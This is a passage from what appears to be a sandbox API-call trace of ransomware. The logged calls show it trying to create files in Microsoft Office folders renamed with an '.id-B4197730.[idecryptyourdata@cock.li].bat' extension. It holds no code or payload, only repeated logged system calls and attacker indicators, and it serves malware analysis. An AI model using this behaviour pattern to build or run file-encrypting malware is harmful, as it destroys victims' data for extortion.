dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.058] CloseHandle (hObject=0x544) returned 1 [0176.171] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.171] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BW.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bw.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.171] CloseHandle (hObject=0x540) returned 1 [0176.172] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.172] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME14.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme14.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.172] CloseHandle (hObject=0x540) returned 1 [0176.174] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.174] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME15.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme15.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.174] CloseHandle (hObject=0x540) returned 1 [0176.176] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.176] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME16.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme16.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.176] CloseHandle (hObject=0x540) returned 1 [0176.177] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.177] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME17.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme17.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.177] CloseHandle (hObject=0x540) returned 1 [0176.178] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.178] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME18.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme18.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.178] CloseHandle (hObject=0x540) returned 1 [0176.179] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.179] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME19.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme19.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.179] CloseHandle (hObject=0x540) returned 1 [0176.180] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.180] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME20.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme20.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.180] CloseHandle (hObject=0x540) returned 1 [0176.181] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.181] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME21.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme21.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.181] CloseHandle (hObject=0x540) returned 1 [0176.182] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.182] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME22.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme22.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.182] CloseHandle (hObject=0x540) returned 1 [0176.183] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.183] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME23.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme23.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.184] CloseHandle (hObject=0x540) returned 1 [0176.184] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.184] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME24.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme24.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.185] CloseHandle (hObject=0x540) returned 1 [0176.186] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.186] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME25.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme25.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.186] CloseHandle (hObject=0x540) returned 1 [0176.187] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.187] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME26.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme26.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.188] CloseHandle (hObject=0x540) returned 1 [0176.189] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.189] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME27.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme27.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.190] CloseHandle (hObject=0x540) returned 1 [0176.190] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.190] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME28.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme28.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.191] CloseHandle (hObject=0x540) returned 1 [0176.191] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.191] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME29.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme29.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.192] CloseHandle (hObject=0x540) returned 1 [0176.192] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.192] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME30.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme30.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.193] CloseHandle (hObject=0x540) returned 1 [0176.194] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.194] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME31.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme31.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.194] CloseHandle (hObject=0x540) returned 1 [0176.195] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.195] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME32.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme32.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.195] CloseHandle (hObject=0x540) returned 1 [0176.196] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.196] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME33.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme33.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.196] CloseHandle (hObject=0x540) returned 1 [0176.197] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.197] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME34.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme34.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.197] CloseHandle (hObject=0x540) returned 1 [0176.199] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.199] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME35.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme35.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.199] CloseHandle (hObject=0x540) returned 1 [0176.200] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.200] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME36.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme36.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.201] CloseHandle (hObject=0x540) returned 1 [0176.201] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.201] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME37.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme37.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.202] CloseHandle (hObject=0x540) returned 1 [0176.202] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.202] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME38.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme38.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.203] CloseHandle (hObject=0x540) returned 1 [0176.203] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.203] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME39.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme39.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.204] CloseHandle (hObject=0x540) returned 1 [0176.565] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.565] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME40.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme40.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.565] CloseHandle (hObject=0x544) returned 1 [0176.566] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.566] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.566] CloseHandle (hObject=0x544) returned 1 [0176.567] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.567] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.568] CloseHandle (hObject=0x544) returned 1 [0176.569] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.569] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.569] CloseHandle (hObject=0x544) returned 1 [0176.575] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.575] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR37F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 